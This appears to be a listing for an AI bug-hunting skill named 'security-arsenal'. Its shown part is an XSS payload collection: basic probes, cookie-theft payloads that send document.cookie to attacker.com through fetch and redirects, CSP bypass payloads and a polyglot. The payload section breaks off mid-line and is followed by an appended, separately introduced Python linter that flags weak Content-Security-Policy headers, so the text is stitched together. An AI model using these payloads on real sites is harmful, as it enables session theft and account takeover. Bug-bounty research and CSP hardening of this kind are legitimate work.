
security-arsenal

Security payloads, bypass tables, wordlists, gf pattern names, always-rejected bug list, and conditionally-valid-with-chain table. Use when you need specific payloads for XSS/SSRF/SQLi/XXE/NoSQLi/command injection/SSTI/IDOR/path-traversal/HTTP smuggling/WebSocket/MFA bypass, bypass techniques, or to check if a finding is submittable. Also use when asked about what NOT to submit.
elementalsouls/Claude-BugHunter · ★ 1,240 · AI & Automation · score 82
Install: claude install-skill elementalsouls/Claude-BugHunter
# SECURITY ARSENAL

Payloads, bypass tables, wordlists, and submission rules.

---

## XSS PAYLOADS

### Basic Probes

```javascript
<script>alert(document.domain)</script>
<img src=x onerror=alert(document.domain)>
<svg onload=alert(document.domain)>
"><script>alert(1)</script>
'><img src=x onerror=alert(1)>
javascript:alert(document.domain)
```

### Cookie Theft (proof of impact)

```javascript
<script>document.location='https://attacker.com/c?c='+document.cookie</script>
<img src=x onerror="fetch('https://attacker.com?c='+document.cookie)">
<script>fetch('https://attacker.com?c='+btoa(document.cookie))</script>
```

### CSP Bypass Techniques

```javascript
// If unsafe-inline blocked — use fetch/XHR
<img src=x onerror="fetch('https://attacker.com?d='+btoa(document.cookie))">

// If script-src nonce present — find nonce reflection
<script nonce="NONCE_FROM_PAGE">alert(1)</script>

// Angular template injection (bypasses many CSPs)
{{constructor.constructor('alert(1)')()}}

// React dangerouslySetInnerHTML reflection
// Vue v-html binding

// mXSS (mutation-based XSS)
<noscript><p title="</noscript><img src=x onerror=alert(1)>">

// Polyglot (works in HTML/JS/CSS context)
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>
```

### DOM XSS Sources and Sinks

```javascript
// Sources (user-contro
```
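Each technique in the CSP Bypass Techniques section depends on a specific weakness in the target's Content-Security-Policy (unsafe-inline without a nonce or hash, unsafe-eval for template gadgets, scheme-wide script sources, missing base-uri). As an added defensive example, not code from the Claude-BugHunter skill, the following Python linter parses a CSP header and reports those weaknesses; `WEAK_CSP` and `STRICT_CSP` are constructed sample headers.

```python
# Added example: flag the CSP weaknesses the bypass list above depends on.
INLINE_SOURCE_PREFIXES = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")

# Constructed sample headers (not from any real site).
WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https:"
STRICT_CSP = ("default-src 'self'; script-src 'nonce-r4nd0m' 'strict-dynamic'; "
              "object-src 'none'; base-uri 'none'")


def parse_csp(header):
    """Split a CSP header into {directive: [source expressions]}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def script_sources(policy):
    """script-src falls back to default-src; with neither, any script runs."""
    return policy.get("script-src", policy.get("default-src", ["*"]))


def csp_findings(header):
    """Return the policy weaknesses that make the payloads above executable."""
    policy = parse_csp(header)
    srcs = script_sources(policy)
    findings = []
    # CSP2+ browsers ignore 'unsafe-inline' once a nonce or hash is present.
    has_nonce_or_hash = any(s.startswith(INLINE_SOURCE_PREFIXES) for s in srcs)
    if "'unsafe-inline'" in srcs and not has_nonce_or_hash:
        findings.append("unsafe-inline: inline scripts and on* handlers run")
    if "'unsafe-eval'" in srcs:
        findings.append("unsafe-eval: template-injection gadgets reach eval")
    # Scheme-only or wildcard sources let any external script load.
    if any(s in ("*", "http:", "https:", "data:") for s in srcs):
        findings.append("broad script source: remote script loads allowed")
    if "object-src" not in policy and "default-src" not in policy:
        findings.append("no object-src: plugin content is unrestricted")
    if "base-uri" not in policy:
        findings.append("no base-uri: <base> injection can redirect relative scripts")
    return findings


if __name__ == "__main__":
    for name, hdr in (("weak", WEAK_CSP), ("strict", STRICT_CSP)):
        print(name, csp_findings(hdr) or ["no findings"])
```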